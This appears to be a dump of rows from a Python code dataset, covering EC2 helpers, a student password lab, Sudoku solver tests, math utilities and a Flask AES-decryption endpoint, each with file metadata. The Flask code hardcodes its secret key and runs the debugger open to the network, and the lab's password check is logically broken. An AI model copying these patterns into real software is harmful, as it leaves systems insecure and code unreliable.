""" IcsEc2: Library for EC2 ----------------------- +--------------------+------------+--+ | This is the IcsEc2 common library. | +--------------------+------------+--+ """ from operator import attrgetter from time import time, mktime, sleep, gmtime, strftime, strptime from boto.ec2 import get_region from boto.ec2.connection import EC2Connection from boto.vpc import connect_to_region as vpc_connect_to_region from opslib.icsexception import IcsEc2Exception import logging log = logging.getLogger(__name__) class IcsEc2(EC2Connection): """ ICS Library for EC2 """ def __init__(self, region, **kwargs): super(IcsEc2, self).__init__( region=get_region(region), **kwargs) def get_instance_attribute(self, instance_id, attr_name): """ Get the attribute value of an instance. :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :type attr_name: string :param attr_name: the name of the instance attribute, details shown as below: :ivar id: The unique ID of the Instance. :ivar groups: A list of Group objects representing the security groups associated with the instance. :ivar public_dns_name: The public dns name of the instance. :ivar private_dns_name: The private dns name of the instance. :ivar state: The string representation of the instance's current state. :ivar state_code: An integer representation of the instance's current state. :ivar previous_state: The string representation of the instance's previous state. :ivar previous_state_code: An integer representation of the instance's current state. :ivar key_name: The name of the SSH key associated with the instance. :ivar instance_type: The type of instance (e.g. m1.small). :ivar launch_time: The time the instance was launched. :ivar image_id: The ID of the AMI used to launch this instance. :ivar placement: The availability zone in which the instance is running. :ivar placement_group: The name of the placement group the instance is in (for cluster compute instances). :ivar placement_tenancy: The tenancy of the instance, if the instance is running within a VPC. An instance with a tenancy of dedicated runs on a single-tenant hardware. :ivar kernel: The kernel associated with the instance. :ivar ramdisk: The ramdisk associated with the instance. :ivar architecture: The architecture of the image (i386|x86_64). :ivar hypervisor: The hypervisor used. :ivar virtualization_type: The type of virtualization used. :ivar product_codes: A list of product codes associated with this instance. :ivar ami_launch_index: This instances position within it's launch group. :ivar monitored: A boolean indicating whether monitoring is enabled or not. :ivar monitoring_state: A string value that contains the actual value of the monitoring element returned by EC2. :ivar spot_instance_request_id: The ID of the spot instance request if this is a spot instance. :ivar subnet_id: The VPC Subnet ID, if running in VPC. :ivar vpc_id: The VPC ID, if running in VPC. :ivar private_ip_address: The private IP address of the instance. :ivar ip_address: The public IP address of the instance. :ivar platform: Platform of the instance (e.g. Windows) :ivar root_device_name: The name of the root device. :ivar root_device_type: The root device type (ebs|instance-store). :ivar block_device_mapping: The Block Device Mapping for the instance. :ivar state_reason: The reason for the most recent state transition. :ivar groups: List of security Groups associated with the instance. :ivar interfaces: List of Elastic Network Interfaces associated with this instance. :ivar ebs_optimized: Whether instance is using optimized EBS volumes or not. :ivar instance_profile: A Python dict containing the instance profile id and arn associated with this instance. """ if not isinstance(instance_id, basestring): raise IcsEc2Exception( "instance_id should be a 'str' not %s" % type(instance_id)) if not isinstance(attr_name, basestring): raise IcsEc2Exception( "attr_name should be a 'str' not %s" % type(attr_name)) resource = self.get_all_instances(instance_ids=instance_id)[0] instance = resource.instances[0] return attrgetter(attr_name)(instance) def get_public_address(self, instance_id): """ Get the public IPv4 address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the public IPv4 address """ return self.get_instance_attribute(instance_id, "ip_address") def get_private_address(self, instance_id): """ Get the private IPv4 address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the private IPv4 address """ return self.get_instance_attribute(instance_id, "private_ip_address") def get_public_dns(self, instance_id): """ Get the public dns address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the public dns address """ return self.get_instance_attribute(instance_id, "public_dns_name") def get_private_dns(self, instance_id): """ Get the private dns address of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: string :return: a string containing the private IPv4 address """ return self.get_instance_attribute(instance_id, "private_dns_name") def get_instance_tags(self, instance_id): """ Get tags of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: dict :return: a dictionary containing the tags of this instance """ tags = self.get_all_tags(filters={"resource-id": instance_id}) ret = {} for tag in tags: ret.update({tag.name: tag.value}) return ret def add_instance_tags(self, instance_id, tags): """ Add tags to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ return self.create_tags(instance_id, tags) def del_instance_tags(self, instance_id, tags): """ Remove tags of the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ return self.delete_tags(instance_id, tags) def get_eips_from_addr(self, eip_list): """ Get EIP objects via the list of EIP addresses :type eip_list: list :param eip_list: the list of EIP addresses :rtype: class :return: EIP objects in boto """ return self.get_all_addresses( filters={'public-ip': eip_list}) def get_eips_from_instance(self, instance_id): """ Get EIP objects via the instance id :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: class :return: EIP objects in boto """ return self.get_all_addresses( filters={'instance-id': instance_id}) def get_instance_event(self, instance_id): """ Get the event of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' """ result = self.get_all_instance_status( instance_ids=instance_id) return result[0].events def get_instance_status(self, instance_id): """ Get the instance status and system status of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: tuple :return: a tuple contains (instance_status, system_status) """ inst_status = self.get_all_instance_status( instance_ids=instance_id) return (inst_status[0].instance_status.status, inst_status[0].system_status.status) def is_instance_healthy(self, instance_id): """ check the health of the specified instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: boolean :return: True/False """ result = self.get_instance_status(instance_id) if result[0].lower() == "ok" and result[1].lower() == "ok": return True else: return False def is_eip_free(self, eip): """ check the availability of the specified EIP address: free or not :type eip: string :param eip: one EIP address :rtype: tuple :return: (True/False, EIP object/None) """ eip_ops = self.get_eips_from_addr(eip) if not eip_ops: return (False, None) eip_op = eip_ops[0] if eip_op.public_ip != eip: raise IcsEc2Exception( "the real eip address %s is not equal to the expected one %s" % (eip_op.public_ip, eip)) if eip_op.instance_id: return (False, eip_op) else: return (True, eip_op) def bind_eip(self, eip, instance_id): """ Bind EIP address to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: bool :return: success or raise IcsEc2Exception """ if isinstance(eip, list): raise IcsEc2Exception( "cannot associate multiple eips '%s' to one instance '%s'" % (eip, instance_id)) result, eipop = self.is_eip_free(eip) if result: log.info("the eip address " + "'%s' will be associated " % eip + "with this instance '%s'" % instance_id) if eipop.domain == "vpc": self.associate_address( instance_id=instance_id, allocation_id=eipop.allocation_id) else: eipop.associate(instance_id=instance_id) elif eipop.instance_id != instance_id: log.warning( "this eip '%s' has been associated with another '%s'" % (eip, eipop.instance_id)) return False else: log.info("the eip address " + "'%s' has been associated " % eip + "with this instance '%s'" % instance_id) return True result, eipop = self.is_eip_free(eip) return not result and eipop.instance_id == instance_id def free_eip(self, eip, instance_id): """ Free EIP address to the instance :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :rtype: bool :return: success or raise IcsEc2Exception """ if isinstance(eip, list): raise IcsEc2Exception( "cannot free multiple eips '%s' to one instance '%s'" % (eip, instance_id)) result, eipop = self.is_eip_free(eip) if result: log.warning("this eip '%s' is not associated with '%s'" % (eip, instance_id)) return True elif eipop.instance_id != instance_id: log.warning( "this eip '%s' has been associated with another '%s'" % (eip, eipop.instance_id)) return True log.info("the eip address " + "'%s' will be disassociated with this instance '%s'" % (eip, instance_id)) eipop.disassociate() return self.is_eip_free(eip)[0] def get_volumes_by_instance(self, instance_id, device_name=None): """ Get boto Volume Objects by instance Id or device name :type instance_id: string :param instance_id: EC2 instance id startwith 'i-xxxxxxx' :type device_name: string :param device_name: device name like '/dev/sdf' :rtype: list :return: list of boto volume objects """ if device_name is None: filters = {'attachment.instance-id': instance_id} else: filters = {'attachment.instance-id': instance_id, 'attachment.device': device_name} return self.get_all_volumes(filters=filters) def take_snapshot(self, volume_id, description=None, tags=None): """ Take a snapshot to existing volume with specific tags :type volume_id: string :param volume_id: EC2 volume id startwith 'vol-xxxxxxx' :type description: string :param description: words to describe the usage of this snapshot :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: class :return: boto snapshot object """ if tags is None: tags = {} snapshot = self.create_snapshot(volume_id, description) tags.update({'VolumeId': volume_id}) timestamp = strftime("%Y%m%d-%H%M", gmtime()) tags.update({'Timestamp': timestamp}) for name, value in tags.iteritems(): if not name.startswith('tag:'): name = name.replace('_', '-') else: name = name.replace('tag:', '') snapshot.add_tag(name, value) return snapshot @staticmethod def format_tags(tags): """ Convert {"Name": "XXX"} to {"tag:Name": "XXX"} """ new_tags = {} for name, value in tags.iteritems(): if not name.startswith('tag:'): name = 'tag:'.join(["", name]) new_tags[name] = value return new_tags def find_snapshot_by_tags(self, tags): """ Find a snapshot by specific tags :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: list :return: list of boto snapshot objects """ tags = self.format_tags(tags) # FIXME: only used for Cassandra if 'tag:Timestamp' in tags and tags['tag:Timestamp'] == '0': refined_tags = {} refined_tags['tag:Role'] = tags['tag:Role'] refined_tags['tag:Timestamp'] = tags['tag:Timestamp'] tags = refined_tags if 'tag:Timestamp' in tags and \ tags['tag:Timestamp'].lower() == 'latest': tags.pop('tag:Timestamp') snapshots = self.get_all_snapshots(filters=self.format_tags(tags)) if snapshots: return self.fetch_latest_snapshot(snapshots) else: return None return self.get_all_snapshots(filters=self.format_tags(tags)) def fetch_latest_snapshot(self, snapshots): """ Find the latest Snapshot """ timestamps = [snapshot.tags['Timestamp'] for snapshot in snapshots] return snapshots[timestamps.index(max(timestamps))] def fetch_snapid_by_tags(self, **tags): """ Find the Snapshot Id by specific tags :type tags: dict :param tags: snapshot tags like {'Name': 'XXX'} :rtype: string :return: Snapshot Id """ # FIXME: if tag:Timestamp == latest, then flag = True flag = False tags = self.format_tags(tags) # FIXME: hard-coded string in tags if 'tag:Timestamp' in tags and \ tags['tag:Timestamp'].lower() == 'latest': del tags['tag:Timestamp'] flag = True snapshots = self.find_snapshot_by_tags(tags) if not snapshots: return None elif len(snapshots) > 1: # FIXME: hard-coded string in tags if not flag: return None snapshot = self.fetch_latest_snapshot(snapshots) if not snapshot: return None else: return snapshot.id else: return snapshots[0].id def clean_snapshots(self, tags, duration): """ Clean up snapshots by specific tags and duration :type tags: dict :param tags: snapshot tags like .. code-block:: javascript { "Name": "XXX" } :type duration: int :param duration: seconds :rtype: list :return: list of cleaned snapshot ids """ snapshots = self.find_snapshot_by_tags(self.format_tags(tags)) deleted_ids = [] for snapshot in snapshots: if 'Timestamp' in snapshot.tags: try: tmp_time = strptime(snapshot.tags[ 'Timestamp'], "%Y%m%d-%H%M") timestamp = mktime(tmp_time) except Exception, e: log.error(e) continue now = mktime(gmtime()) if now - timestamp > duration: deleted_ids.append(snapshot.id) self.del_snapshot(snapshot.id) return deleted_ids def del_snapshot(self, snapshot_id): """ Delete snapshots by snapshot_id :type snapshot_id: string :param snapshot_id: snapshot Id like 'snap-xxxxxx' :rtype: boolean :return: true, false, exception """ return self.delete_snapshot(snapshot_id) def find_ami_by_tags(self, tags): """ Find AMI by specific tags :type tags: dict :param tags: AMI tags like {'Name': 'XXX'} :rtype: list :return: list of boto image objects """ return self.get_all_images(filters=self.format_tags(tags)) def fetch_imageid_by_tags(self, **tags): """ Fetch the Image Id by specific tags :type tags: dict :param tags: AMI tags like {'Name': 'XXX'} :rtype: string :return: Image Id """ images = self.find_ami_by_tags(self.format_tags(tags)) if not images: return None elif len(images) > 1: return None else: return images[0].id def get_all_zones(self, zones=None): """ Get all Availability Zones under this region :type zones: list :param zones: specified zone list :rtype: list :return: list of availability zones in this region """ if zones is not None and isinstance(zones, list): return zones else: return [zone.name for zone in super(IcsEc2, self).get_all_zones()] def size_of_all_zones(self, zones=None): """ Get the number of all Availability Zones under this region :type zones: list :param zones: specified zone list :rtype: int :return: number of availability zones in this region """ zone_list = self.get_all_zones(zones) if zone_list: return len(zone_list) else: return 0 def get_sgroup(self, name, vpc_id=None): """ Get Security Group Name (if Ec2) / Id (if Vpc) :param name: security group name :type name: string :param vpc_id: vpc id :type vpc_id: string :rtype: string :return: security group id """ if vpc_id is None: return name else: filters = {'vpc-id': vpc_id, 'group-name': name} group = self.get_all_security_groups(filters=filters) if group and isinstance(group, list): return group[0].id else: return None def get_security_group_id(self, name, vpc_id=None): """ Get security group id :param name: security group name :type name: string :param vpc_id: vpc id :type vpc_id: string :rtype: string :return: security group id """ if vpc_id: filters = {'vpc-id': vpc_id, 'group-name': name} else: filters = {'group-name': name} group = self.get_all_security_groups(filters=filters) if group: return group[0].id else: return None def get_az_from_subnet_id(self, subnet_id=None, zones=None): """ Get the name of Availability Zone by its Subnet Id :type zones: list :param zones: specified zone list :type subnet_id: string or comma-seperated list of string :param subnet_id: subnet id :rtype: list :return: a list of availability zone names """ if subnet_id is None: return self.get_all_zones(zones) vpc = vpc_connect_to_region(self.region.name) if isinstance(subnet_id, basestring): subnet_ids = subnet_id.lstrip().rstrip().split(",") else: return None zones = [] for sid in subnet_ids: subnets = vpc.get_all_subnets(sid) if subnets and isinstance(subnets, list): zones.append(subnets[0].availability_zone) return zones def get_zone_name_for_cassandra(self, index, zones=None): """ Get the name of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone name like "us-west-2a" """ zone_list = self.get_all_zones(zones) zone_size = self.size_of_all_zones(zones) return zone_list[(int(index) - 1) % zone_size] def get_zone_index_for_cassandra(self, index, zones=None): """ Get the index of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone index like "1" """ zone_size = self.size_of_all_zones(zones) return str((int(index) - 1) / zone_size + 1) def get_zone_suffix_for_cassandra(self, index, zones=None): """ Get the suffix of Availability Zone for Cassandra :type zones: list :param zones: specified zone list :type index: int :param index: the index of cassandra instance :rtype: string :return: zone suffix like "a-1" """ return "-".join([self.get_zone_name_for_cassandra(index, zones)[-1], self.get_zone_index_for_cassandra(index, zones)]) # vim: tabstop=4 shiftwidth=4 softtabstop=4
32.155405
79
0.586005
2,863
23,795
4.725463
0.114565
0.074654
0.017296
0.022175
0.507798
0.436396
0.38399
0.360041
0.317392
0.290191
0
0.004877
0.327884
23,795
739
80
32.198917
0.841055
0.007985
0
0.322464
0
0
0.083786
0.003625
0
0
0
0.002706
0
0
null
null
0
0.025362
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
99e153d1e909e07a485231b3678975bc8a52fb3d
540
py
Python
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
[ "MIT" ]
null
null
null
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
[ "MIT" ]
null
null
null
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
[ "MIT" ]
null
null
null
# Pair Programming passphrase = "Megmo" and "megmo" null1 = "123" null2 = "letmein" null3 = "password" while True: password = str(input("Please enter password: ")) if null3 in password: print("Incorrect | Password has password inside") if null2 in password: print("Incorrect | password has letmein") if null1 in password: print("Incorrect | Password has 123") if passphrase in password and not null1 and not null2 and not null3: print("Correct | Password validated") break
22.5
72
0.655556
66
540
5.363636
0.409091
0.112994
0.127119
0.20339
0.29661
0.29661
0
0
0
0
0
0.037313
0.255556
540
23
73
23.478261
0.843284
0.02963
0
0
0
0
0.342912
0
0
0
0
0
0
1
0
false
0.733333
0
0
0
0.266667
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
99e157d8a51a96d3537d160b4ad726d341cf4d8c
149
py
Python
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
from sqlalchemy import create_engine from pywky.db.models import Base engine = create_engine('sqlite:///worky_dev.db') Base.metadata.bind = engine
21.285714
48
0.791946
22
149
5.227273
0.636364
0.208696
0
0
0
0
0
0
0
0
0
0
0.107383
149
6
49
24.833333
0.864662
0
0
0
0
0
0.147651
0.147651
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
4
99e2c1f902345ae0e7cb8b3c3a60e5be6b0705b4
2,680
py
Python
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
# -*- coding:utf-8 -*- from __future__ import division import numpy as np import os import math import pickle as Pickle import pynlpir import random from math import log from numpy import linalg as LA def F(rhoM, proDict): # print rhoM res = 0 for pm in proDict: P = np.trace(np.dot(proDict[pm][1], rhoM)) res += proDict[pm][0] * log(P) # print('value of target F function = {}'.format(res)) return res def Grad_F(rhoM, proDict, dim): res = np.zeros((dim, dim)) for pm in proDict: trace_val = np.trace(np.dot(proDict[pm][1], rhoM)) res += (proDict[pm][0] * proDict[pm][1] / trace_val) return res def rho_bar(rhoM, proDict, dim): grad_f = Grad_F(rhoM, proDict, dim) res = (np.dot(grad_f,rhoM) + np.dot(rhoM,grad_f))/2 return res def rho_tilde(rhoM, proDict, dim): grad_f = Grad_F(rhoM, proDict, dim) grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f) res = grad_rho_grad/np.trace(grad_rho_grad) return res def D_bar(rhoM, proDict, dim): return(rho_bar(rhoM, proDict,dim)-rhoM) def D_tilde(rhoM, proDict, dim): return(rho_tilde(rhoM, proDict,dim)-rhoM) def q_t(t, rhoM, proDict, dim): grad_f = Grad_F(rhoM, proDict, dim) grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f) res = 1+2*t+t*t*np.trace(grad_rho_grad) return res def D(t, rhoM, proDict, dim): # 公式(19) grad_f = Grad_F(rhoM, proDict, dim) grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f) d_bar = D_bar(rhoM, proDict, dim) d_tilde = D_tilde(rhoM, proDict,dim) q = q_t(t, rhoM, proDict, dim) res = (2/q)*d_bar + (t*np.trace(grad_rho_grad)/q)*d_tilde return res def set_t(t): return max(1, t) def judgement(rhoM, proDict,f_old, dim, threshold_values = (1e-7, 1e-7, 1e-7)): grad_f = Grad_F(rhoM, proDict, dim) grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f) grad_rho = np.dot(grad_f,rhoM) diff = f_old - F(rhoM, proDict) if(LA.norm(rhoM - grad_rho_grad)< threshold_values[0] and LA.norm(rhoM -grad_rho)< threshold_values[1] and abs(diff)< threshold_values[2]): return False else: return True def judge_t(t, d, rhoM, proDict, dim, iter_r): # print 'please see here:' f_new = F(rhoM + t * d, proDict) f_old = F(rhoM, proDict) diff = iter_r * t * np.trace(np.dot(Grad_F(rhoM, proDict,dim), d)) if(f_new == f_old): return False # print(f_new-f_old) return(f_new <=f_old+diff) def test_set_generator(proj_num,vector_dim): dictionary = {} for i in range(proj_num): weight = np.random.random() vector = np.random.rand(1,vector_dim) vector = vector/(math.sqrt(np.dot(vector,np.transpose(vector)))) projector = np.outer(vector, vector) / np.inner(vector, vector) dictionary['word_'+str(i)] = [weight, projector] return dictionary
26.8
140
0.691791
494
2,680
3.574899
0.184211
0.143262
0.150623
0.06342
0.463194
0.292752
0.270102
0.253681
0.253681
0.218573
0
0.010582
0.153731
2,680
100
141
26.8
0.768078
0.050746
0
0.256757
0
0
0.00197
0
0
0
0
0
0
1
0.162162
false
0
0.121622
0.040541
0.432432
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99e3ac14b2ccc4454ba52221648a884910d0156c
69
py
Python
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
1
2016-09-29T16:51:00.000Z
2016-09-29T16:51:00.000Z
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
null
null
null
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
null
null
null
#! /usr/bin/env python from foodify import app app.run(debug = True)
17.25
23
0.724638
12
69
4.166667
0.916667
0
0
0
0
0
0
0
0
0
0
0
0.144928
69
4
24
17.25
0.847458
0.304348
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
4
99e3d3333d7aa18597378ca4a913a1eccc683dc6
4,400
py
Python
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
4
2020-07-05T08:19:40.000Z
2021-01-02T03:00:27.000Z
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
1
2021-03-13T10:41:59.000Z
2021-03-13T10:41:59.000Z
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
null
null
null
"""This python script can be used to test the correctness and finiteness of the algorithms.""" from multiprocessing import Process from BASolver2 import bASolve, bASolverHandle from OPBASolver import OPSolverHandle import time # bASolve() class NonFiniteException(Exception): pass def testcorrectness(algo): """"Test the algorithm specified in <algo> algo: 1: BA-Algorithm 2: OPBA-Algorithm 3: Algorithm X The input will be passed to the algorithm directly """ if algo == 1: return testBA() elif algo == 2: return testOPBA() elif algo == 3: return testAlgoX() def locBASOLVE(grid): print(bASolverHandle(grid)) # print(grid) def testBA(): inputs = [] validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(validInput) wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9 inputs.append(wrongdim) # 8 is two times in a collomn at start, therfore unsolvable. invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invStart) # 22 is not valid. invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invNumbers) emptyinp = [[0 for _ in range(9)] for _ in range(9)] inputs.append(emptyinp) for inp in inputs: proc = Process(target=locBASOLVE, args=[inp]) proc.start() curtim = time.time() proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds if abs(curtim-time.time()) >10: print("ERROR, took longer than 10 seconds. Stoped after 10 seconds") raise NonFiniteException("The solver took more than 10 seconds.") proc.terminate() print("NEXT") def testOP(): inputs = [] validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(validInput) wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9 inputs.append(wrongdim) # 8 is two times in a collomn at start, therfore unsolvable. invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invStart) # 22 is not valid. invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invNumbers) # Empty field: emptyinp = [[0 for _ in range(9)] for _ in range(9)] inputs.append(emptyinp) for inp in inputs: proc = Process(target=OPSolverHandle, args=[inp]) proc.start() curtim = time.time() proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds if abs(curtim-time.time()) >10: print("ERROR, took longer than 10 seconds. Stoped after 10 seconds") raise NonFiniteException("The solver took more than 10 seconds.") proc.terminate() print("NEXT") def testOPBA(): pass def testAlgoX(): pass if __name__ == "__main__": testBA() testOP() testAlgoX() # print(bASolverHandle([[0 for _ in range(9)] for _ in range(9)]))
35.483871
278
0.503409
851
4,400
2.586369
0.13396
0.094503
0.051795
0.025443
0.722853
0.722853
0.722853
0.722853
0.722853
0.712403
0
0.183504
0.289091
4,400
124
279
35.483871
0.520141
0.1475
0
0.641791
0
0
0.05614
0
0
0
0
0
0
1
0.089552
false
0.044776
0.059701
0
0.208955
0.074627
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
5
99e491fbbf30f0808a4fe6456d18b36c7d57a986
1,647
py
Python
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
from crypt import methods from this import s from flask import Flask, request, jsonify import base64 import os from Crypto.Cipher import AES from urllib.parse import unquote app = Flask(__name__) secret = 'TESTTESTTESTTEST' p_char = '%' def unpad_str(msg): msg = msg.decode('utf-8') msg = msg.rstrip('%') return msg def decrypt_message(msg, key): decoded_encrypted_msg = base64.b64decode(msg) cipher = AES.new(key) try: decrypted_msg = cipher.decrypt(decoded_encrypted_msg) except: raise Exception('Error Decrypting') else: unpadded_private_msg = unpad_str(decrypted_msg) return unpadded_private_msg def decode_str(msg): msg = msg.rstrip(p_char) splitted = msg.split(':') splitted_bev = splitted[4].split(';') resp_dect = {} resp_dect['id'] = int(float(splitted[0])) resp_dect['name'] = splitted[1] resp_dect['email'] = splitted[2] resp_dect['emp_no'] = 'N/A' if (splitted[3] == '0.0') else splitted[3] resp_dect['beverages'] = splitted_bev resp_dect['food_preference'] = splitted[5] return resp_dect @app.route("/decrypt", methods=['GET']) def decrypt(): args = request.args encrypted_string = args.get('enc_str') dec_str = '' try: dec_str = decrypt_message(encrypted_string, secret) except: return jsonify({'error': 'Invalid User!!'}), 400, {'ContentType': 'application/json'} else: processed_res = decode_str(dec_str) return jsonify({'data': processed_res}), 200, {'ContentType': 'application/json'} if __name__ == "__main__": app.run(host="0.0.0.0", debug=True)
25.734375
93
0.659381
217
1,647
4.774194
0.428571
0.061776
0.017375
0.023166
0
0
0
0
0
0
0
0.019757
0.200971
1,647
63
94
26.142857
0.767477
0
0
0.12
0
0
0.120219
0
0
0
0
0
0
1
0.08
false
0
0.14
0
0.32
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
